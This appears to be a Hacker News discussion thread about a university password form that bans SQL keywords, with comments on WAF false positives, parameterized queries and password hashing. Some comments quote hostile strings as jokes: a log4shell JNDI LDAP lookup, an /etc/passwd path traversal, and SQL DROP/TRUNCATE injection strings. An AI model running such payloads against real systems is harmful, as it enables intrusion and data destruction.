Bingo... I hate WAF with a passion, wasted so many hours debugging weird issues when it turned out that they were blocked by some kind of black box WAF the client put in front of their systems.

singingfish
0 replies
10h47m

Thanks,

I just implemented the subset of what we actually needed from a WAF with haproxy, and I'm delighted to say our stuff is extremely effective (as we got a nice flood attack the day after go live), and that it's 10% of the cost, and presumably 10% of the maintenance of the proprietary solution we evaluated.

jamesfinlayson
0 replies
17h29m

Ah makes sense - someone in a business unit was having a weird failure updating something last week and I couldn't see any failures in the application logs. I looked on their computer and could say that Akamai was blocking the request, and after some trial and error I found that it was because a text field contained (* - which it thought looked like SQL.

iforgotpassword
0 replies
18h21m

"malicious" requests in this case. I actually dealt with a contact form of a health insurance company that had something like this going on, but there wasn't any error page showing up, you just got a blank page after submit if something resembled SQL. In my case it was the words "select" and "from" too close to each other in a sentence.

balou23
0 replies
8h39m

Someone said you couldn't put ../../../../etc/passwd here in hackernews due to cloudflare waf. Let's see...

Aeolun
0 replies
13h31m

Oh, yeah. My Infra As Code state was also blocked by the WAF because it looked too much like SQL injection apparently.

LoveMortuus
0 replies
6h24m

Interesting that such situations occur even in academic circles. Especially on the scale of a whole university.

Oh, since it's University of Ljubljana, lepi pozdravi z Maribora! ^^

I guess one could also do "DROP TABLE *", should they want to experience what it means when Google removed "Don't be evil" from the preface of their Code of Conduct.

crumpled
1 replies
14h40m

It's just a string on a page? Or does validation actually prevent you?

crumpled
0 replies
14h35m

I think I figured it out. There is no validation. This is just a contact form and someone sees the plaintext password.

aidenn0
1 replies
15h32m

I had an issue with one site where the maximum length on the "create new password" field was longer than the "maxlength" property on the input field for the login form. I couldn't figure out why I could use my password manager's autofill to login (since it ignored the maxlength), but couldn't type or paste my password in.

tareqak
0 replies
13h21m

I think I've run into this issue multiple times but in the context of web-based login vs. logging in from an app. The problem went away when I used a shorter password.

runlaszlorun
0 replies
21h41m

That’s hilarious. And why I love HN.

cbsmith
0 replies
22h2m

I love that you actually posted here.

wkat4242
6 replies
23h6m

Instead of making sure SQL injection is not possible at all by using proper stored procedures and other techniques, they just limit a few keywords and hope hackers don't come up with something that they haven't thought of like some escaping trick.

Yeah that would probably work for a while. Until someone proves it doesn't :P

It's not really rocket science anymore to make sure user input doesn't mix with your SQL. This is not 2005.

And really if this works in the first place you're storing the passwords unhashed which was even a dumb thing in 2005. If the same applies to the username or other user input fields it would make a bit more sense but passwords should never enter the database like that.

hamburglar
1 replies
21h16m

You realize, don’t you, that the fact that this made the front page tells us that you are explaining things that are obvious to this audience?

wkat4242
0 replies
21h3m

Of course!

I was being sarcastic :) It's ridiculous that this kind of thing still happens.

dmurray
1 replies
19h31m

And really if this works in the first place you're storing the passwords unhashed

Not really, your RDBMS probably supports some hash functions so you could be storing them hashed as "UPDATE USERS SET PASSWORD = SHA2($PASSWORD)" which would be vulnerable to SQL injection yet does not store unhashed passwords.

There are good reasons I'd recommend to do the hashing in the application layer instead, but doing it in the DB (with correctly parameterized queries, of course) is not so terrible.

wkat4242
0 replies
3h54m

Maybe not terrible but certainly not great. It's best to keep confidential info exposed to as few components as possible.

jrockway
0 replies
22h29m

I think it was early 2005 when I wrote my first database app, and I didn't find it that hard to not mix user data with SQL. (I think I even ran my CGI script in "taint mode". Remember that!?)

MathMonkeyMan
0 replies
21h26m

At work, we were discussing how to serialize some structured data as an HTTP request header value. I reflexively said "ascii subset of JSON without newlines," but that was rejected for some reasons (maybe too much punctuation, verbose for Chinese...). Someone came up with pipe-separated fields, but then that was rejected too. The reason was something like "some customers used to have proxies that would reject any headers that include a pipe character."

My point is that voodoo programming isn't always due to lack of due diligence. It's due to knowing that something went wrong with something in the past, but for which there is no evidence, and about which you would be able to do nothing.

My preference is to deploy it anyway, see if it breaks, and if necessary work it out with the customer after the fact. That's unpopular for good and obvious reasons, so no pipe characters.

amne
6 replies
1d4h

still better than "password used by another account"

lucb1e
5 replies
1d3h

Not sure if serious. We need this. If you can guess someone else's password by accident, both of you need a password reset and that password needs to go on the denylist.

Modern advice for strong passwords is having a length requirement and checking the input against a list of known passwords, for example using the HIBP partial hash API. (Any time you see forced expiration or complexity requirements, you're dealing with a legacy/cargocult system.)

dragonmost
3 replies
1d

The server shouldn't even be able to know that a password is being reused as it should be hashed and salted there is no situation where this would be acceptable

Falmarri
2 replies
23h28m

You can hash them without a salt and store them in a set of passwords not associated to user accounts to enforce uniqueness without having to actually know the passwords

duskwuff
1 replies
22h45m

That still introduces a fairly serious vulnerability. The lack of salting on the "password uniqueness" database makes it a juicy target; an attacker with access to the database can attack those passwords, then try the ones which are known to be valid from there against the salted passwords in the user database.

actuallyalys
0 replies
21h14m

I wonder if there’s some way to mitigate this by either only keeping the uniqueness database long enough to identify duplicates and then deleting it or by using this on lower priority systems that people may reuse passwords from for your higher security one. In either case, the small number of bad passwords you would identify that you couldn’t come up with yourself or find on common password lists probably makes this a bad tradeoff.

actuallyalys
0 replies
21h28m

The safe way to do this is to check a password against a list of common passwords, as Jeff Atwood suggests [0] rather than against your other passwords. As other replies point out, you shouldn’t be able to compare your passwords’ plaintext to each other like you’re proposing[1].

[0]: https://blog.codinghorror.com/the-god-login/

[1]: I suppose you could salt and hash the user’s password against every other user’s password and their salt, but if you chose an appropriate password hash function and parameters, that would take infeasibly long.

Edit: I missed that you essentially suggested this already. Sorry about that. However, I think the way Atwood explains it is useful.

ipython
5 replies
1d4h

Phew. They’ll never catch me. My password is

    ${jndi:ldap://hunter2.com/totallylegit}

dmd
4 replies
1d4h

Nope - that's not a valid ldap URL - or even a valid domain, for that matter. Domains can only contain the ascii leters a-z and the digits 0-9 -- asterisks are not permitted; the only symbol permitted is a hyphen (and it cannot start or end with one).

lucb1e
3 replies
1d3h

It's a log4shell reference

dmd
1 replies
1d3h

But you missed the actual joke.

lucb1e
0 replies
1d3h

Indeed. I wasn't sure if you weren't aware of the log4shell reference or if I was majorly missing your point. The latter, then!

anoopelias
0 replies
1d3h
chasil
5 replies
1d4h

Did someone have a Bobby Tables moment?

https://bobby-tables.com/

In Oracle, you can't use a bind variable in setting a password on an account, so SQL injection is a more significant risk. I wrote some JavaScript and pl/sql to address that.

Falmarri
2 replies
23h30m

Do you mean setting a database user account? As in the oracle user? Why is that exposed over the web?

SoftTalker
1 replies
22h57m

There is/was a school of thought that each user should have their own database account, and the application should connect to the database as that user. The advantage being you can use the database's built-in user and role management and privileges instead of having to invent your own. I have admittedly not seen this done much, but there is a certain appeal to it.

d0gsg0w00f
0 replies
18h47m

I work for a company that is trying to bolt this functionality onto all the AWS database products. At least at the IAM role level.

As it stands now, no human can write to a DB in prod-- only service accounts.

javitury
1 replies
1d4h

I hope that javascript filter runs on the server and not on the web browser...

chasil
0 replies
1d3h

The php runs on the server, and does the same thing.

The JavaScript posts excessive status messages, and only allows a submit when all checks have passed.

turminal
4 replies
1d4h

The funniest part of this is that they don't even check for all of the banned strings.

Source: I'm a student there and tried it out of curiosity.

wmil
2 replies
1d4h

They'll probably use the disclamer as an excuse to blame you if something breaks.

lucb1e
1 replies
1d3h

"... killed, or worse, expelled!" (https://www.quotes.net/mquote/41411)

Seriously though, I doubt there would be any consequences even if some BOFH tried to blame you

avgcorrection
0 replies
1d3h

I had a pause when saw that the TLD is `si`. But then I found out that it’s just Slovenia.

elevatedastalt
0 replies
18h45m

It's easy to ensure compliance when the risk of non-compliance is getting expelled.

julienreszka
4 replies
1d4h

For people wondering how to do this properly it's called parametrized queries.

readthenotes1
3 replies
1d4h

You mean storing plain text passwords in a database is safe?

sevensevennine
0 replies
1d4h

Absolutely right-- the warning is only necessary if they're not hashing the password before templating the string prior to storage.

dylan604
0 replies
1d4h

Naturally. You just use a different name for that field than password, and the hackers will never know! /s

da768
0 replies
1d3h

you could still hope it's a WAF issue or they're hashing passwords through the database query, though both unlikely

kazinator
3 replies
1d4h

All five words are also common English words found in any major dictionary. If you're not actually doing anything stupid with the passwords, all you have to do is use that same diagnostic for that situation: "password may not contain dictionary words". Then you don't have a diagnostic which raises red flags.

That the developer is not aware that their diagnostic raises a red flag itself raises a red flag. It doesn't occur to them that a system which issues this diagnostic will be suspected of doing stupid things. That tends to betray a lack of sophistication in the area of security.

ylyn
1 replies
1d3h

That's not a reasonable requirement at all. A common recommendation nowadays is to have passphrases..

kazinator
0 replies
1d

You're right; if the pass phrase has twenty random words, some of which are select or insert, then that's a bad diagnostic.

nephanth
0 replies
1d1h

Except this restriction effectively bans xkcd passes (4 random dictionary words)

simion314
2 replies
1d4h

A few years ago I was working on some app that would use Wordpress API to post stuff. The customers had their own WP installation on various hosting with various "security" features. We had bug reports where posting to the blog failed and would post empty content, this security plugins would scan a big blog post and if it would find something like ".... select <a few paragraphs of text> from " it would replace that POST parameter with an empty string.

Also seen similar stuff on a customer bug report, where request from our server containing html text inside a json field would get injected with some obfuscated javascript, I could not be sure if it was a "security" plugin or malware.

bazzargh
1 replies
1d4h

we had one a while back where a small number of requests were failing for a particular set of pages. We first spotted that all the urls contained 'select' (generally as part of a parameter name, like itemselect), so I went digging for WAF-like filters anywhere in the stack. I found that we had some ancient config in a proxy server from before we used a commercial waf that looked for `SELECT.*UNION` ... flicked back to the URLs and found they'd all also all had a parameter like 'company=credit+union'.

Facepalm, and ripped the code out, we had plenty of protection elsewhere

simion314
0 replies
1d3h

Yeah, the hard part is when you do not control the server, so you need to tell your customer to contact their costing and fix the issue, sometimes we got the id of the security rule that triggered the issue but not all the time.

This security products feel like a scam.

kstrauser
2 replies
20h52m

I once couldn't register for a website because my last name contained the word "user". Yes, it does. Given the choice between changing my name, lying about my name, or signing up with a competitor instead, I chose the dignified option.

buggy6257
1 replies
20h46m

So… what’s your new last name?

kstrauser
0 replies
20h32m

Mud.

walrus01
1 replies
1d4h

Until very recently the online banking password for a major (big-5) Canadian bank couldn't be longer than 9 characters or contain ANY special punctuation characters from the ASCII code set. It was very clear that they're storing them in plaintext in a database on some archaic mainframe somewhere.

jesprenj
0 replies
1d3h

Slovenian bank (NKBM) only permits 6 digit passwords and nothing else -- probably so that users can dial them via DTMF when on the phone.

throwawaaarrgh
1 replies
20h50m

Worked on a system like this once. Nobody wanted to fix the actual backend problem so this limitation was a requirement. But I figured that advertising these little "quirks" in the login flow would give hackers ideas, so instead I just added a function to transform the "bad input" into an alternative set of characters that wouldn't have a negative effect on upstream. Since you couldn't view the saved password, nobody realized they were being transformed behind the scenes. Stupid yet effective.

knallfrosch
0 replies
20h6m

Until someone builds out your transform

pbhjpbhj
1 replies
1d3h

Perhaps their system is fine but this is a way to filter out people who are likely to try breeching the Uni security so they know who to watch? Or there's a ctf challenge for local security agencies...

nephanth
0 replies
1d1h

A more efficient way to do that would be to flag people doing that to admins, not to tell them not to do it

donohoe
1 replies
1d3h

Would be better if they provided a drop-down list of safe passwords to use. A pre-defined choice of 12 should be enough.

pixl97
0 replies
2h51m

Heh, reminds me of the kid safe chats that used to exist more in the past where you could only select from a limited dictionary of words to make sentences. People still found a way to say some pretty terrible things.

dathinab
1 replies
1d3h

the only place situation where such rules can matter is if you already _massively_ messed up security

(most fundamental rule of handling passwords is to never store them anywhere, never log them either, b etc. they should go straight to the hashing function and no where else)

strken
0 replies
19h4m

It matters if your stupid WAF blocks anything that looks like SQL.

avgcorrection
1 replies
1d4h

I want more innovation in the password requirement genre:

Your password must be valid SQL, Java, Go, or C++ string. Or a haiku about grocery shopping. This way it won’t look like a password in case we leak it.

wongarsu
0 replies
1d3h

It's pretty common to force usernames to be valid C or Pascal identifiers (only letters digits and underscores, first character can't be a digit). So why not extend the reasoning to passwords. /s

Syzygies
1 replies
22h29m

A legendary xkcd: "Did you really name your son Robert'); DROP TABLE Students;-- ?

https://xkcd.com/327/

danesparza
0 replies
21h47m

Awww ... little Bobby tables!

OscarCunningham
1 replies
1d3h

I've heard people being told 'sanitize your inputs!' too many times. The advice should be 'escape your outputs!'.

JanisErdmanis
0 replies
1d3h

Also, don’t use eval on your inputs, but instead make proper endpoints.

wly_cdgr
0 replies
19h55m

I don't see any downside here. It's just another layer of protection. So what if it's not sufficient?

vldr
0 replies
9h50m

"extra security is good, though"

https://xkcd.com/463/

(no not the bobby tables xkcd)

tkems
0 replies
22h52m

This sounds like a hold-over from an older system. I've heard stories of certain universities and banks using old mainframe systems for central authentication. In one instance I've heard that passwords were stored in plaintext and truncated to 8 characters, uppercase only.

The main reason, that I've heard at least, for not upgrading these systems is cost and complexity. Why upgrade a system that is working for $$$$ when we can restrict passwords and add some basic 'security' for $.

seydor
0 replies
23h18m

drop database users; truncate table posts;

rco8786
0 replies
19h19m

Makes me ponder the question - what’s the worst you could do to a sql database without using those strings (at least not directly).

They don’t prohibit semi colons so there’s still some potential here.

pierrekin
0 replies
20h3m

I was made to do this at work also. The reasoning went something like this.

Yes of course we need to properly escape all strings that we render / use parametised queries to avoid injection attacks, however we also need defense in depth, so all fields need to reject code that looks like sql or html.

It was easier to just add this that push back. Sigh.

neom
0 replies
22h50m

For those who don't feel like clicking around to learn more: It's the student identity management portal for the University of Ljubljana in Slovenia.

moogly
0 replies
1d4h

That's fine. I'll just use `truncate` instead.

jrockway
0 replies
22h30m

Good thing my password is ROLLBACK.

josephcsible
0 replies
1d1h

Apparently someone read https://thedailywtf.com/articles/Injection_Rejection and didn't realize that it wasn't a best practice.

dboreham
0 replies
23h13m

And definitely don't register the vanity vehicle license plate "NULL".

cco
0 replies
20h35m

I work at an auth company (Stytch) and sometimes developers ask me about input restrictions on passwords in our API.

I've had folks ask me if we support emoji, "code/SQL" like in this example, Chinese characters etc.

So fun to see and hear from folks on all sorts of stacks, especially legacy systems where layers of cruft have accreted over time to produce Byzantine requirements like this.

captain_bender
0 replies
15h31m

There are a number of South Korean websites that allow us to use only ‘!, @, #, $, %, ^, &, *’. They still force people to include those characters, and the 'maximum' password length is like 20, sometimes 12.

butz
0 replies
2h20m

They should add a list of passwords already used, you know, for security.

bitwize
0 replies
22h0m

Bobby Tables: "Drat, foiled again!"

beardyw
0 replies
1d2h

This admits they are updating the database wrong and storing the password wrong.

amluto
0 replies
1d

Off the top of my head, they forgot MERGE INTO, which is supported by several major databases. Also ALTER, GRANT, SET, and probably many others.

This particular variant of defense in depth is also rather missing the point: this field is a password. The question isn’t “did everyone remember to properly escape the password or properly use parameter binding” — the question is “did everyone remember not to store the plaintext password?” By the time someone does:

    Execute(“UPDATE xyz SET abc = ?”, password)
Or however your database API spells it, you have already messed up massively.

KevinMS
0 replies
1d2h

maybe they just got sick of script kiddies bloating their users table with lame hacking attempts. This might discourage them.

Hippocrates
0 replies
19h25m

If I were an adversary this would certainly pique my interest.